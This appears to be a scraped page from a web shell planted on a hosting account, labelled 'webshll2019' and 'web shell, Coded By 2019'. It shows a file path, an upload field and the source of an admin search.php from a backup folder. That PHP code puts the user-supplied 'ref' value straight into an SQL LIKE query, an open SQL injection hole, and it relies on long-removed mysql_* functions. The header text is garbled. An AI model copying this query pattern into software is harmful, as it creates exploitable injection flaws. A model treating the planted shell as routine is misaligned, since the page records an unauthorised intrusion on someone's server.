?

áEÓê¤ÎïLwebshll2019

Current Path : /home/webyoo/www/backup/allback/docteur-site/cv/sym/a/backup/allback/myagenda/admin/
Upload File :
Current File : /home/webyoo/www/backup/allback/docteur-site/cv/sym/a/backup/allback/myagenda/admin/search.php

<?php
if (!defined('IN_WWW') || !defined('IN_ADMIN'))
    exit();

if($_POST && !empty($_POST['ref']))
{
    $titre = $_POST['ref'];

    $extraire = mysql_query("SELECT id FROM agenda_events WHERE titre like '%$titre%'");
    $nbr = mysql_num_rows($extraire);
	
	$row = mysql_fetch_array($extraire);

    if($nbr>0)
    {
        header("Location: ./?a=events&op=edit&k={$row['id']}");
        
    }
    else
        $site_Content .= '<p>Tache inexistante.</p>';
}



web shell, Coded By 2019